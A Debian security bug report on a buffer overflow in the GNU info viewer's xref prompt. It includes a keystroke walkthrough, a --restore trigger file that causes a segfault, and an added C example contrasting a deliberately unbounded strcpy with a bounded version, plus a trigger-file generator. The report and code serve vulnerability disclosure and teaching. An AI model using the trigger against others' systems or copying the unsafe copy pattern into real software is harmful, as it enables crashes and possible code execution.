GNU/Linux info Buffer Overflow
Package: info
Version: 4.7-2.1
Severity: grave
Tags: security
Justification: user security hole
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.7
Locale: LANG=C, LC_CTYPE=C
Versions of packages info depends on:
ii libc6 2.3.2.ds1-15 GNU C Library: Shared libraries an
ii libncurses5 5.4-4 Shared libraries for terminal hand
-- no debconf information
Information:
I have tested several versions (Debian stable, unstable and testing) and
have found that this bug exists in all versions tested. I have included
a small --restore script that can be used to leverage a simple segfault.
This buffer overflow is very easy to trigger, and there appear to be
several bytes of slack available (10-15+) beyond the crash point. It may
be possible to make arbitrary system calls through this hole. It can
also be triggered non-interactively from the command line with the
--restore=FILENAME flag, so the program need not already be running.
Although info is not installed setuid and does not run as a daemon, in
a setup where info is offered as a public service (for example behind a
restricted login or a web front end) this may be a security problem.
The bug seems only to be reachable from a node that has cross-references
(xrefs) available, since it is the xref-following prompt that overflows.
Walkthrough:
$ info info
[info screen comes up]
press 'g'
[Goto Node:]
type 'Expert Info' <enter>
(OR any other way to get to a page with xrefs)
press 'f'
Type 225 or more bytes at the [Follow xref:] prompt and press Enter.
SEG FAULT!
Example File:
The following can be saved to a file (here info.bug) and run as
info info --restore=info.bug to reproduce the segmentation fault.
[START info.bug]
gExpert Info
fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[END info.bug]
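To make the bug class behind the walkthrough and the example file concrete, here is an added C example. It is not code from GNU info or from the original report: it models a prompt answer being copied into a fixed-size stack buffer with no length check (the vulnerable pattern), puts a bounded variant beside it that rejects over-long input instead of truncating it, and includes a small writer that emits a --restore key script in the same shape as info.bug above ('g' + node name + Enter, then 'f' + filler + Enter). The buffer size LABEL_MAX, the function names and the node name used in main() are assumptions for illustration; the 225-byte figure is taken from the report.

```c
/* Added example, not GNU info source and not from the original report.
 * Assumptions (illustrative only): LABEL_MAX as the buffer size, the
 * function names, and "Expert Info" as the target node, as in the report. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LABEL_MAX 224   /* assumed buffer capacity; report: >= 225 bytes crash */

/* Vulnerable pattern: unbounded copy of a prompt answer into a fixed
 * stack buffer.  Overflows once strlen(answer) >= LABEL_MAX.  Present only
 * for comparison; never call it with untrusted input. */
int follow_xref_unsafe(const char *answer)
{
    char label[LABEL_MAX];
    strcpy(label, answer);              /* no length check: the bug class */
    return (int)strlen(label);
}

/* Hardened variant: bound the copy and reject over-long input rather than
 * truncating (a silently truncated xref label would resolve to the wrong
 * node).  Returns the number of bytes stored, or -1 on rejection. */
int follow_xref_safe(const char *answer, char *out, size_t outsz)
{
    size_t n = strlen(answer);
    if (outsz == 0 || n >= outsz)       /* need room for the NUL too */
        return -1;
    memcpy(out, answer, n + 1);
    return (int)n;
}

/* Writes a --restore key script shaped like info.bug in the report:
 * "g<node>\n" then "f" + nbytes of 'A' + "\n".  Returns bytes written
 * or -1 on I/O error.  The key letters are those the report uses. */
long write_trigger(FILE *out, const char *node, size_t nbytes)
{
    int r = fprintf(out, "g%s\n", node);
    if (r < 0)
        return -1;
    long written = r;
    if (fputc('f', out) == EOF)
        return -1;
    written++;
    for (size_t i = 0; i < nbytes; i++) {
        if (fputc('A', out) == EOF)
            return -1;
        written++;
    }
    if (fputc('\n', out) == EOF)
        return -1;
    return written + 1;
}

/* Usage: ./a.out [nbytes]   (default 225, the report's threshold)
 * Runs the answer through the safe path and writes info.bug in the cwd. */
int main(int argc, char **argv)
{
    size_t n = argc > 1 ? strtoul(argv[1], NULL, 10) : 225;
    char *answer = malloc(n + 1);
    if (!answer)
        return 1;
    memset(answer, 'A', n);
    answer[n] = '\0';

    char label[LABEL_MAX];
    int rc = follow_xref_safe(answer, label, sizeof label);
    printf("safe path: %s %zu-byte answer\n", rc < 0 ? "rejected" : "accepted", n);

    FILE *f = fopen("info.bug", "w");
    if (!f) {
        free(answer);
        return 1;
    }
    long w = write_trigger(f, "Expert Info", n);
    fclose(f);
    printf("wrote info.bug (%ld bytes); try: info info --restore=info.bug\n", w);
    free(answer);
    return 0;
}
```

The rejection in follow_xref_safe is deliberate: for a label that is looked up by name, truncating to fit is as wrong as overflowing, just quieter. The writer is there so the threshold can be varied (./a.out 224, ./a.out 225, ...) to find the exact crash boundary on a given build rather than trusting the number in the report.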